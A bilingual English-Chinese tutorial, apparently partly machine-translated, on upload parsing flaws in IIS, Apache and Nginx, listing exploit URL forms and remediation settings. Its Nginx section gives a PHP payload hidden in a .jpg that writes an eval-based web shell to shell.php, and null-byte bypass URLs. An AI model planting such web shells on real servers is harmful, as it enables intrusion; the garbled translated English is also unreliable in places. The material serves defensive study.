Server upload vulnerability of Parsing Vulnerability
Upload loopholes IIS5.x-6.x Parsing Vulnerability
Use iis5.x-6.x version of the server, mostly Server Windows
2003, more ancient site, developed statements generally asp; the parsing vulnerability can only be resolved asp files, not parse aspx file.
Directory parsing (6.0)
形式:www.xxx.com/xx.asp/xx.jpg
原理: 服务器默认会把.asp,.asa目录下的文件都解析成asp文件。
File parsing
形式:www.xxx.com/xx.asp;.jpg
原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。
Parsing the file type
IIS6.0 默认的可执行文件除了asp还包含这三种 :
/test.asa
/test.cer
/test.cdx
Rehabilitation program
1.目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传xx.asp;.jpg类型的文件名。
2.做好权限设置,限制用户创建文件夹。
Apache parsing vulnerability upload loopholes
Vulnerabilities principle
Rule Apache parse the file is from right to left to start parsing to determine if the suffix unrecognized file parsing, and then be left to judge. For example test.php.owf.rar
".owf" and ".rar" suffix two unrecognizable parsing apache, apache will be parsed into the oldboy.php.owf.rar php.
Vulnerability form
www.xxxx.xxx.com/test.php.php123
The remaining configuration issues leading to vulnerability
(1) If there is such a line configuration AddHandler php5-script .php in the Apache conf in
this case as long as the file name contains .php file name is test2.php.jpg even with php will be performed.
(2) if there is such a line disposed in the Apache conf AddType application / x-httpd-php .jpg even if the extension is jpg, php can be performed in the same manner.
Rehabilitation program
1.apache配置文件,禁止.php.这样的文件执行,配置文件里面加入
<Files ~ “.(php.|php3.)”>
Order Allow,Deny
Deny from all
</Files>
2. pseudo-static to solve this problem, override similar .php. * Such a document, open the apache httpd.conf find LoadModule rewrite_module modules / mod_rewrite.so
the number # removed, restart apache, built on the site's root directory. htaccess file, as follows:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .(php.|php3.) /index.php
RewriteRule .(pHp.|pHp3.) /index.php
RewriteRule .(phP.|phP3.) /index.php
RewriteRule .(Php.|Php3.) /index.php
RewriteRule .(PHp.|PHp3.) /index.php
RewriteRule .(PhP.|PhP3.) /index.php
RewriteRule .(pHP.|pHP3.) /index.php
RewriteRule .(PHP.|PHP3.) /index.php
</IfModule>
nginx upload vulnerability of Parsing Vulnerability
Vulnerabilities principle
Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问www.xx.com/phpinfo.jpg/1.php这个URL时,$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI,但是PHP为什么会接受这样的参数,并将phpinfo.jpg作为PHP文件解析呢?这就要说到fix_pathinfo这个选项了。 如果开启了这个选项,那么就会触发在PHP中的如下逻辑:
PHP会认为SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就会将phpinfo.jpg作为PHP文件来解析了
Vulnerability form
www.xxxx.com/UploadFiles/image/1.jpg/1.php
www.xxxx.com/UploadFiles/image/1.jpg%00.php
www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php
xxx.jpg%00.php (Nginx <8.03 空字节代码执行漏洞)
另外一种手法:上传一个名字为test.jpg,以下内容的文件。
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。
Rehabilitation program
1.修改php.ini文件,将cgi.fix_pathinfo的值设置为0;
2.在Nginx配置文件中添加以下代码:
if ( $fastcgi_script_name ~ ..*/.*php )
{
return 403;
}
This line means that when the URL matched to similar test.jpg / a.php will return an error code 403. Upload loopholes IIS7.5 8 Parsing Vulnerability
vulnerability IIS7.5 with nginx similar, are due php configuration file, open the cgi.fix_pathinfo, which is not nginx or iis7.5 vulnerability itself.
https://www.xp.cn/a.php/182.html
When installation is complete, php.ini in default cgi.fix_pathinfo = 1, its time to visit, when the URL path extension will add .php as a php file is parsed, the resulting vulnerabilities
Note: Before the actual test, I found loopholes and no later discovered to be set off FastCGI, that seems to be used to process the data file
when the defense put cgi. fix_pathinfo = 0, and open FastCGI so, since you can play high-level point
to create cmd.txt file contents
<?php
fputs(fopen('shell.php','w'),'<?php phpinfo();?>');
//创建新的文件
?>
保存后,重命名为cmd.jpg 文件
再次进行访问
note
当phpstudy切换回去的时候,不一定可以运行,需要进行再配置